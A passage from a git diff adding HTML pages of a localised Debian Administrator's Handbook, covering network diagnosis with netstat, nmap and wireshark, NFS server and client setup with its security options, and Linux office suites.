+                    class="literal">-u</code>, which works similarly for UDP connections; these options are not mutually exclusive, and one of them is enough to stop displaying Unix-domain connections;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">-a</code>, to also list listening sockets (waiting for incoming connections);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">-n</code>, to display the results numerically: IP addresses (no DNS resolution), port numbers (no aliases as defined in <code
+                    class="filename">/etc/services</code>) and user ids (no login names);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">-p</code>, to list the processes involved; this option is only useful when <code
+                    class="command">netstat</code> is run as root, since normal users will only see their own processes;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">-c</code>, to continuously refresh the list of connections.
+					</div></li></ul></div><div
+            class="para">
+				Other options, documented in the <span
+              class="citerefentry"><span
+                class="refentrytitle">netstat</span>(8)</span> manual page, provide an even finer control over the displayed results. In practice, the first five options are so often used together that systems and network administrators practically acquired <code
+              class="command">netstat -tupan</code> as a reflex. Typical results, on a lightly loaded machine, may look like the following:
+			</div><pre
+            class="screen scale">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>netstat -tupan</code></strong>
+<code
+              class="computeroutput">Active Internet connections (servers and established)
+Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
+tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      397/rpcbind     
+tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      431/sshd        
+tcp        0      0 0.0.0.0:36568           0.0.0.0:*               LISTEN      407/rpc.statd   
+tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      762/exim4       
+tcp        0    272 192.168.1.242:22        192.168.1.129:44452     ESTABLISHED 1172/sshd: roland [
+tcp6       0      0 :::111                  :::*                    LISTEN      397/rpcbind     
+tcp6       0      0 :::22                   :::*                    LISTEN      431/sshd        
+tcp6       0      0 ::1:25                  :::*                    LISTEN      762/exim4       
+tcp6       0      0 :::35210                :::*                    LISTEN      407/rpc.statd   
+udp        0      0 0.0.0.0:39376           0.0.0.0:*                           916/dhclient    
+udp        0      0 0.0.0.0:996             0.0.0.0:*                           397/rpcbind     
+udp        0      0 127.0.0.1:1007          0.0.0.0:*                           407/rpc.statd   
+udp        0      0 0.0.0.0:68              0.0.0.0:*                           916/dhclient    
+udp        0      0 0.0.0.0:48720           0.0.0.0:*                           451/avahi-daemon: r
+udp        0      0 0.0.0.0:111             0.0.0.0:*                           397/rpcbind     
+udp        0      0 192.168.1.242:123       0.0.0.0:*                           539/ntpd        
+udp        0      0 127.0.0.1:123           0.0.0.0:*                           539/ntpd        
+udp        0      0 0.0.0.0:123             0.0.0.0:*                           539/ntpd        
+udp        0      0 0.0.0.0:5353            0.0.0.0:*                           451/avahi-daemon: r
+udp        0      0 0.0.0.0:39172           0.0.0.0:*                           407/rpc.statd   
+udp6       0      0 :::996                  :::*                                397/rpcbind     
+udp6       0      0 :::34277                :::*                                407/rpc.statd   
+udp6       0      0 :::54852                :::*                                916/dhclient    
+udp6       0      0 :::111                  :::*                                397/rpcbind     
+udp6       0      0 :::38007                :::*                                451/avahi-daemon: r
+udp6       0      0 fe80::5054:ff:fe99::123 :::*                                539/ntpd        
+udp6       0      0 2001:bc8:3a7e:210:a:123 :::*                                539/ntpd        
+udp6       0      0 2001:bc8:3a7e:210:5:123 :::*                                539/ntpd        
+udp6       0      0 ::1:123                 :::*                                539/ntpd        
+udp6       0      0 :::123                  :::*                                539/ntpd        
+udp6       0      0 :::5353                 :::*                                451/avahi-daemon: r
+</code></pre><div
+            class="para">
+				As expected, this lists established connections, two SSH connections in this case, and applications waiting for incoming connections (listed as <code
+              class="literal">LISTEN</code>), notably the Exim4 email server listening on port 25.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.nmap"></a>10.8.2. Remote Diagnosis: <code
+                    class="command">nmap</code></h3></div></div></div><a
+            id="id-1.13.11.4.2"
+            class="indexterm"></a><div
+            class="para">
+				<code
+              class="command">nmap</code> (in the similarly-named package) is, in a way, the remote equivalent for <code
+              class="command">netstat</code>. It can scan a set of “well-known” ports for one or several remote servers, and list the ports where an application is found to answer to incoming connections. Furthermore, <code
+              class="command">nmap</code> is able to identify some of these applications, sometimes even their version number. The counterpart of this tool is that, since it runs remotely, it cannot provide information on processes or users; however, it can operate on several targets at once.
+			</div><div
+            class="para">
+				A typical <code
+              class="command">nmap</code> invocation only uses the <code
+              class="literal">-A</code> option (so that <code
+              class="command">nmap</code> attempts to identify the versions of the server software it finds) followed by one or more IP addresses or DNS names of machines to scan. Again, many more options exist to finely control the behavior of <code
+              class="command">nmap</code>; please refer to the documentation in the <span
+              class="citerefentry"><span
+                class="refentrytitle">nmap</span>(1)</span> manual page.
+			</div><pre
+            class="screen scale"
+            width="80">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>nmap mirtuel</code></strong>
+<code
+              class="computeroutput">
+Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-09 16:46 CET
+Nmap scan report for mirtuel (192.168.1.242)
+Host is up (0.000013s latency).
+rDNS record for 192.168.1.242: mirtuel.internal.placard.fr.eu.org
+Not shown: 998 closed ports
+PORT    STATE SERVICE
+22/tcp  open  ssh
+111/tcp open  rpcbind
+
+Nmap done: 1 IP address (1 host up) scanned in 2.41 seconds
+# </code><strong
+              class="userinput"><code>nmap -A localhost</code></strong>
+<code
+              class="computeroutput">
+Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-09 16:46 CET
+Nmap scan report for localhost (127.0.0.1)
+Host is up (0.000013s latency).
+Other addresses for localhost (not scanned): 127.0.0.1
+Not shown: 997 closed ports
+PORT    STATE SERVICE VERSION
+22/tcp  open  ssh     OpenSSH 6.7p1 Debian 3 (protocol 2.0)
+|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
+25/tcp  open  smtp    Exim smtpd 4.84
+| smtp-commands: mirtuel Hello localhost [127.0.0.1], SIZE 52428800, 8BITMIME, PIPELINING, HELP, 
+|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP 
+111/tcp open  rpcbind 2-4 (RPC #100000)
+| rpcinfo: 
+|   program version   port/proto  service
+|   100000  2,3,4        111/tcp  rpcbind
+|   100000  2,3,4        111/udp  rpcbind
+|   100024  1          36568/tcp  status
+|_  100024  1          39172/udp  status
+Device type: general purpose
+Running: Linux 3.X
+OS CPE: cpe:/o:linux:linux_kernel:3
+OS details: Linux 3.7 - 3.15
+Network Distance: 0 hops
+Service Info: Host: mirtuel; OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 11.54 seconds
+</code></pre><div
+            class="para">
+				As expected, the SSH and Exim4 applications are listed. Note that not all applications listen on all IP addresses; since Exim4 is only accessible on the <code
+              class="literal">lo</code> loopback interface, it only appears during an analysis of <code
+              class="literal">localhost</code> and not when scanning <code
+              class="literal">mirtuel</code> (which maps to the <code
+              class="literal">eth0</code> interface on the same machine).
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.sniffers"></a>10.8.3. Sniffers: <code
+                    class="command">tcpdump</code> and <code
+                    class="command">wireshark</code></h3></div></div></div><div
+            class="para">
+				Sometimes, one needs to look at what actually goes on the wire, packet by packet. These cases call for a “frame analyzer”, more widely known as a <span
+              class="emphasis"><em>sniffer</em></span>. Such a tool observes all the packets that reach a given network interface, and displays them in a user-friendly way.
+			</div><a
+            id="id-1.13.11.5.3"
+            class="indexterm"></a><div
+            class="para">
+				The venerable tool in this domain is <code
+              class="command">tcpdump</code>, available as a standard tool on a wide range of platforms. It allows many kinds of network traffic capture, but the representation of this traffic stays rather obscure. We will therefore not describe it in further detail.
+			</div><a
+            id="id-1.13.11.5.5"
+            class="indexterm"></a><div
+            class="para">
+				A more recent (and more modern) tool, <code
+              class="command">wireshark</code> (in the <span
+              class="pkg pkg">wireshark</span> package), has become the new reference in network traffic analysis due to its many decoding modules that allow for a simplified analysis of the captured packets. The packets are displayed graphically with an organization based on the protocol layers. This allows a user to visualize all protocols involved in a packet. For example, given a packet containing an HTTP request, <code
+              class="command">wireshark</code> displays, separately, the information concerning the physical layer, the Ethernet layer, the IP packet information, the TCP connection parameters, and finally the HTTP request itself.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="figure.wireshark"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/wireshark.png"
+                  alt="The wireshark network traffic analyzer" /></div></div><p
+              class="title"><strong>Obrázek 10.1. The <code
+                  class="command">wireshark</code> network traffic analyzer</strong></p></div><div
+            class="para">
+				In our example, the packets traveling over SSH are filtered out (with the <code
+              class="literal">!tcp.port == 22</code> filter). The packet currently displayed was developed at the HTTP layer.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> <code
+                        class="command">wireshark</code> with no graphical interface: <code
+                        class="command">tshark</code></strong></p></div></div></div><a
+              id="id-1.13.11.5.9.2"
+              class="indexterm"></a><div
+              class="para">
+				When one cannot run a graphical interface, or does not wish to do so for whatever reason, a text-only version of <code
+                class="command">wireshark</code> also exists under the name <code
+                class="command">tshark</code> (in a separate <span
+                class="pkg pkg">tshark</span> package). Most of the capture and decoding features are still available, but the lack of a graphical interface necessarily limits the interactions with the program (filtering packets after they've been captured, tracking of a given TCP connection, and so on). It can still be used as a first approach. If further manipulations are intended and require the graphical interface, the packets can be saved to a file and this file can be loaded into a graphical <code
+                class="command">wireshark</code> running on another machine.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.dhcp.html"><strong>Předcházející</strong>10.7. DHCP</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="network-services.html"><strong>Další</strong>Kapitola 11. Network Services: Postfix, Apache, N...</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.nfs-file-server.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.nfs-file-server.html
new file mode 100644
index 000000000..b7486fc23
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.nfs-file-server.html
@@ -0,0 +1,279 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">11.4. NFS File Server</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Postfix, Apache, NFS, Samba, Squid, OpenLDAP, SIP" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-services.html"
+        title="Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN" /><link
+        rel="prev"
+        href="sect.ftp-file-server.html"
+        title="11.3. FTP File Server" /><link
+        rel="next"
+        href="sect.windows-file-server-with-samba.html"
+        title="11.5. Setting Up Windows Shares with Samba" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.nfs-file-server.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.ftp-file-server.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.windows-file-server-with-samba.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.nfs-file-server"></a>11.4. NFS File Server</h2></div></div></div><div
+          class="para">
+			NFS (<span
+            class="emphasis"><em>Network File System</em></span>) is a protocol allowing remote access to a filesystem through the network. All Unix systems can work with this protocol; when Windows systems are involved, Samba must be used instead.
+		</div><a
+          id="id-1.14.7.3"
+          class="indexterm"></a><a
+          id="id-1.14.7.4"
+          class="indexterm"></a><a
+          id="id-1.14.7.5"
+          class="indexterm"></a><a
+          id="id-1.14.7.6"
+          class="indexterm"></a><a
+          id="id-1.14.7.7"
+          class="indexterm"></a><div
+          class="para">
+			NFS is a very useful tool but, historically, it has suffered from many limitations, most of which have been addressed with version 4 of the protocol. The downside is that the latest version of NFS is harder to configure when you want to make use of basic security features such as authentication and encryption since it relies on Kerberos for those parts. And without those, the NFS protocol must be restricted to a trusted local network since data goes over the network unencrypted (a <span
+            class="emphasis"><em>sniffer</em></span> can intercept it) and access rights are granted based on the client's IP address (which can be spoofed).
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>DOCUMENTATION</em></span> NFS HOWTO</strong></p></div></div></div><div
+            class="para">
+			Good documentation to deploy NFSv4 is rather scarce. Here are some pointers with content of varying quality but that should at least give some hints on what should be done. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://help.ubuntu.com/community/NFSv4Howto">https://help.ubuntu.com/community/NFSv4Howto</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://wiki.linux-nfs.org/wiki/index.php/Nfsv4_configuration">http://wiki.linux-nfs.org/wiki/index.php/Nfsv4_configuration</a></div>
+		</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.7.10"></a>11.4.1. Securing NFS</h3></div></div></div><a
+            id="id-1.14.7.10.2"
+            class="indexterm"></a><div
+            class="para">
+				If you don't use the Kerberos-based security features, it is vital to ensure that only the machines allowed to use NFS can connect to the various required RPC servers, because the basic protocol trusts the data received from the network. The firewall must also block <span
+              class="emphasis"><em>IP spoofing</em></span> so as to prevent an outside machine from acting as an inside one, and access to the appropriate ports must be restricted to the machines meant to access the NFS shares.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> RPC</strong></p></div></div></div><div
+              class="para">
+				RPC (<span
+                class="emphasis"><em>Remote Procedure Call</em></span>) is a Unix standard for remote services. NFS is one such service.
+			</div><a
+              id="id-1.14.7.10.4.3"
+              class="indexterm"></a><a
+              id="id-1.14.7.10.4.4"
+              class="indexterm"></a><div
+              class="para">
+				RPC services register to a directory known as the <span
+                class="emphasis"><em>portmapper</em></span>. A client wishing to perform an NFS query first addresses the <span
+                class="emphasis"><em>portmapper</em></span> (on port 111, either TCP or UDP), and asks for the NFS server; the reply usually mentions port 2049 (the default for NFS). Not all RPC services necessarily use a fixed port.
+			</div></div><div
+            class="para">
+				Older versions of the protocol required other RPC services which used dynamically assigned ports. Fortunately, with NFS version 4, only port 2049 (for NFS) and 111 (for the portmapper) are needed and they are thus easy to firewall.
+			</div><a
+            id="id-1.14.7.10.6"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.7.11"></a>11.4.2. NFS Server</h3></div></div></div><div
+            class="para">
+				The NFS server is part of the Linux kernel; in kernels provided by Debian it is built as a kernel module. If the NFS server is to be run automatically on boot, the <span
+              class="pkg pkg">nfs-kernel-server</span> package should be installed; it contains the relevant start-up scripts.
+			</div><div
+            class="para">
+				The NFS server configuration file, <code
+              class="filename">/etc/exports</code>, lists the directories that are made available over the network (<span
+              class="emphasis"><em>exported</em></span>). For each NFS share, only the given list of machines is granted access. More fine-grained access control can be obtained with a few options. The syntax for this file is quite simple:
+			</div><a
+            id="id-1.14.7.11.4"
+            class="indexterm"></a><a
+            id="id-1.14.7.11.5"
+            class="indexterm"></a><pre
+            class="programlisting">
+/directory/to/share machine1(option1,option2,...) machine2(...) ...
+</pre><div
+            class="para">
+				Note that with NFSv4, all exported directories must be part of a single hierarchy and that the root directory of that hierarchy must be exported and identified with the option <code
+              class="literal">fsid=0</code> or <code
+              class="literal">fsid=root</code>.
+			</div><div
+            class="para">
+				Each machine can be identified either by its DNS name or its IP address. Whole sets of machines can also be specified using either a syntax such as <code
+              class="literal">*.falcot.com</code> or an IP address range such as <code
+              class="literal">192.168.0.0/255.255.255.0</code> or <code
+              class="literal">192.168.0.0/24</code>.
+			</div><div
+            class="para">
+				Directories are made available as read-only by default (or with the <code
+              class="literal">ro</code> option). The <code
+              class="literal">rw</code> option allows read-write access. NFS clients typically connect from a port restricted to root (in other words, below 1024); this restriction can be lifted by the <code
+              class="literal">insecure</code> option (the <code
+              class="literal">secure</code> option is implicit, but it can be made explicit if needed for clarity).
+			</div><a
+            id="id-1.14.7.11.10"
+            class="indexterm"></a><div
+            class="para">
+				By default, the server only answers an NFS query when the current disk operation is complete (<code
+              class="literal">sync</code> option); this can be disabled with the <code
+              class="literal">async</code> option. Asynchronous writes increase performance a bit, but they decrease reliability since there is a data loss risk in case of the server crashing between the acknowledgment of the write and the actual write on disk. Since the default value changed recently (as compared to the historical value of NFS), an explicit setting is recommended.
+			</div><div
+            class="para">
+				In order to not give root access to the filesystem to any NFS client, all queries appearing to come from a root user are considered by the server as coming from the <code
+              class="literal">nobody</code> user. This behavior corresponds to the <code
+              class="literal">root_squash</code> option, and is enabled by default. The <code
+              class="literal">no_root_squash</code> option, which disables this behavior, is risky and should only be used in controlled environments. The <code
+              class="literal">anonuid=<em
+                class="replaceable">uid</em></code> and <code
+              class="literal">anongid=<em
+                class="replaceable">gid</em></code> options allow specifying another fake user to be used instead of UID/GID 65534 (which corresponds to user <code
+              class="literal">nobody</code> and group <code
+              class="literal">nogroup</code>).
+			</div><div
+            class="para">
+				With NFSv4, you can add a <code
+              class="literal">sec</code> option to indicate the security level that you want: <code
+              class="literal">sec=sys</code> is the default with no special security features, <code
+              class="literal">sec=krb5</code> enables authentication only, <code
+              class="literal">sec=krb5i</code> adds integrity protection, and <code
+              class="literal">sec=krb5p</code> is the most complete level which includes privacy protection (with data encryption). For this to work you need a working Kerberos setup (that service is not covered by this book).
+			</div><div
+            class="para">
+				Other options are available; they are documented in the <span
+              class="citerefentry"><span
+                class="refentrytitle">exports</span>(5)</span> manual page.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> First installation</strong></p></div></div></div><div
+              class="para">
+				The <code
+                class="filename">/etc/init.d/nfs-kernel-server</code> boot script only starts the server if the <code
+                class="filename">/etc/exports</code> lists one or more valid NFS shares. On initial configuration, once this file has been edited to contain valid entries, the NFS server must therefore be started with the following command:
+			</div><pre
+              class="screen">
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>service nfs-kernel-server start</code></strong></pre></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.7.12"></a>11.4.3. NFS Client</h3></div></div></div><a
+            id="id-1.14.7.12.2"
+            class="indexterm"></a><a
+            id="id-1.14.7.12.3"
+            class="indexterm"></a><div
+            class="para">
+				As with other filesystems, integrating an NFS share into the system hierarchy requires mounting. Since this filesystem has its peculiarities, a few adjustments were required in the syntaxes of the <code
+              class="command">mount</code> command and the <code
+              class="filename">/etc/fstab</code> file.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.14.7.12.5"></a><p
+              class="title"><strong>Příklad 11.22. Manually mounting with the <code
+                  class="command">mount</code> command</strong></p><div
+              class="example-contents"><pre
+                class="screen">
+          <code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mount -t nfs4 -o rw,nosuid arrakis.internal.falcot.com:/shared /srv/shared</code></strong></pre></div></div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.14.7.12.6"></a><p
+              class="title"><strong>Příklad 11.23. NFS entry in the <code
+                  class="filename">/etc/fstab</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+arrakis.internal.falcot.com:/shared /srv/shared nfs4 rw,nosuid 0 0
+</pre></div></div><div
+            class="para">
+				The entry described above mounts, at system startup, the <code
+              class="filename">/shared/</code> NFS directory from the <code
+              class="literal">arrakis</code> server into the local <code
+              class="filename">/srv/shared/</code> directory. Read-write access is requested (hence the <code
+              class="literal">rw</code> parameter). The <code
+              class="literal">nosuid</code> option is a protection measure that wipes any <code
+              class="literal">setuid</code> or <code
+              class="literal">setgid</code> bit from programs stored on the share. If the NFS share is only meant to store documents, another recommended option is <code
+              class="literal">noexec</code>, which prevents executing programs stored on the share. Note that on the server, the <code
+              class="filename">shared</code> directory is below the NFSv4 root export (for example <code
+              class="filename">/export/shared</code>), it is not a top-level directory.
+			</div><div
+            class="para">
+				The <span
+              class="citerefentry"><span
+                class="refentrytitle">nfs</span>(5)</span> manual page describes all the options in some detail.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.ftp-file-server.html"><strong>Předcházející</strong>11.3. FTP File Server</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.windows-file-server-with-samba.html"><strong>Další</strong>11.5. Setting Up Windows Shares with Samba</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.office-suites.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.office-suites.html
new file mode 100644
index 000000000..bd096a0b9
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.office-suites.html
@@ -0,0 +1,135 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">13.8. Office Suites</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="prev"
+        href="sect.collaborative-work.html"
+        title="13.7. Collaborative Work" /><link
+        rel="next"
+        href="sect.windows-emulation.html"
+        title="13.9. Emulating Windows: Wine" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.office-suites.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.collaborative-work.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.windows-emulation.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.office-suites"></a>13.8. Office Suites</h2></div></div></div><a
+          id="id-1.16.11.2"
+          class="indexterm"></a><a
+          id="id-1.16.11.3"
+          class="indexterm"></a><div
+          class="para">
+			Office software has long been seen as lacking in the free software world. Users require replacements for Microsoft tools such as Word and Excel, but these are so complex that replacements were hard to develop. The situation changed when Sun released the StarOffice code under a free license as OpenOffice, a project which later gave birth to Libre Office, which is available on Debian. The KDE project also has its own office suite, called Calligra Suite (previously KOffice), and GNOME, while never offering a comprehensive office suite, provides AbiWord as a word processor and Gnumeric as a spreadsheet. The various projects each have their strengths. For instance, the Gnumeric spreadsheet is better than OpenOffice.org/Libre Office in some domains, notably the precision of its calculations. On the word processing front, the Libre Office suite still leads the way.
+		</div><a
+          id="id-1.16.11.5"
+          class="indexterm"></a><a
+          id="id-1.16.11.6"
+          class="indexterm"></a><a
+          id="id-1.16.11.7"
+          class="indexterm"></a><a
+          id="id-1.16.11.8"
+          class="indexterm"></a><a
+          id="id-1.16.11.9"
+          class="indexterm"></a><a
+          id="id-1.16.11.10"
+          class="indexterm"></a><div
+          class="para">
+			Another important feature for users is the ability to import Microsoft Office documents. Even though all office suites have this feature, only the ones in OpenOffice.org and Libre Office are functional enough for daily use.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>THE BROADER VIEW</em></span> Libre Office replaces OpenOffice.org</strong></p></div></div></div><div
+            class="para">
+			OpenOffice.org contributors set up a foundation (<span
+              class="emphasis"><em>The Document Foundation</em></span>) to foster the project's development. The idea had been discussed for some time, but the actual trigger was Oracle's acquisition of Sun. The new ownership made the future of OpenOffice under Oracle uncertain. Since Oracle declined to join the foundation, the developers had to give up on the OpenOffice.org name. This office suite is now known as <span
+              class="emphasis"><em>Libre Office</em></span>, and is available in Debian.
+		</div><div
+            class="para">
+			After a period of relative stagnation on OpenOffice.org, Oracle donated the code and associated rights to the Apache Software Foundation, and OpenOffice is now an Apache project. This project is not currently available in Debian and is rather moribund when compared to Libre Office.
+		</div></div><a
+          id="id-1.16.11.13"
+          class="indexterm"></a><a
+          id="id-1.16.11.14"
+          class="indexterm"></a><a
+          id="id-1.16.11.15"
+          class="indexterm"></a><a
+          id="id-1.16.11.16"
+          class="indexterm"></a><div
+          class="para">
+			Libre Office and Calligra Suite are available in the <span
+            class="pkg pkg">libreoffice</span> and <span
+            class="pkg pkg">calligra</span> Debian packages, respectively. Although the <span
+            class="pkg pkg">gnome-office</span> package was previously used to install a collection of office tools such as AbiWord and Gnumeric, this package is no longer part of Debian, with the individual packages now standing on their own.
+		</div><div
+          class="para">
+			Language-specific packs for Libre Office are distributed in separate packages, most notably <span
+            class="pkg pkg">libreoffice-l10n-*</span> and <span
+            class="pkg pkg">libreoffice-help-*</span>. Some features such as spelling dictionaries, hyphenation patterns and thesauri are in separate packages, such as <span
+            class="pkg pkg">myspell-*</span>, <span
+            class="pkg pkg">hunspell-*</span>, <span
+            class="pkg pkg">hyphen-*</span> and <span
+            class="pkg pkg">mythes-*</span>.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.collaborative-work.html"><strong>Předcházející</strong>13.7. Collaborative Work</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.windows-emulation.html"><strong>Další</strong>13.9. Emulating Windows: Wine</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.other-derivatives.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.other-derivatives.html
new file mode 100644
index 000000000..68aeac8e6
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.other-derivatives.html
@@ -0,0 +1,94 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.13. And Many More</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
